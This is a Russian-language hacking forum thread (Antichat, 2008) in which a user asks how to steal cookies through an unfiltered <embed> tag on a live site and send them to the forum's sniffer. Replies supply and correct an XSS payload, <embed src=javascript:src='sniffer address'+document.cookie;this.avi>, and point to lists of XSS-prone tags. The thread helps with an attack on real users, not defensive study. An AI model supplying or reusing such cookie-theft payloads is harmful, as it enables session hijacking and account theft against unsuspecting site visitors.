HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу использование тега embed для угона cookies ?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

использование тега embed для угона cookies ?
  #1  
Старый 14.12.2008, 00:51
ickhz
Новичок
Регистрация: 01.12.2008
Сообщений: 7
С нами: 9180110

Репутация: 0
Question использование тега embed для угона cookies ?
Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 14.12.2008, 00:53
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
также, как и обычно
 
Ответить с цитированием

  #3  
Старый 14.12.2008, 01:06
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.
 
Ответить с цитированием

  #4  
Старый 14.12.2008, 01:07
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию
В XSS не особо,но по моему так:
<embed src=javascript:src='адрес снифера';this.avi>
 
Ответить с цитированием

  #5  
Старый 14.12.2008, 01:16
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
+document.cookie
 
Ответить с цитированием

  #6  
Старый 14.12.2008, 01:19
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию
Бля,точно,пропустил
спс за поправку!
 
Ответить с цитированием

  #7  
Старый 14.12.2008, 01:29
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Вообще,есть список *уязвимых* тегов касательно XSS.
http://www.inattack.ru/article/519.html к примеру,но был список и получше...
 
Ответить с цитированием

  #8  
Старый 15.12.2008, 18:06
ickhz
Новичок
Регистрация: 01.12.2008
Сообщений: 7
С нами: 9180110

Репутация: 0
По умолчанию
А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..

alert(document.cookies) выдает вместо cookies undefined

Типа защита такая что-ли))))
 
Ответить с цитированием

  #9  
Старый 15.12.2008, 19:31
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию
ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.
 
Ответить с цитированием

  #10  
Старый 16.12.2008, 15:15
ickhz
Новичок
Регистрация: 01.12.2008
Сообщений: 7
С нами: 9180110

Репутация: 0
По умолчанию
Цитата:
Сообщение от freddi  
ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.
Точно.. сорри! Теперь выводит пустой алерт.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Создание сети: обжимка проводов petrovich-lamer Windows 13 02.07.2007 13:18
Программы для работы с железом. Часть I – настройка видеокарт _GaLs_ "Железо" 2 20.12.2006 01:18
"Доктор Веб" выпустила новые версии антивирусов для ОС Unix/Linux TTN_ Мировые новости. Обсуждения. 0 31.08.2006 21:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.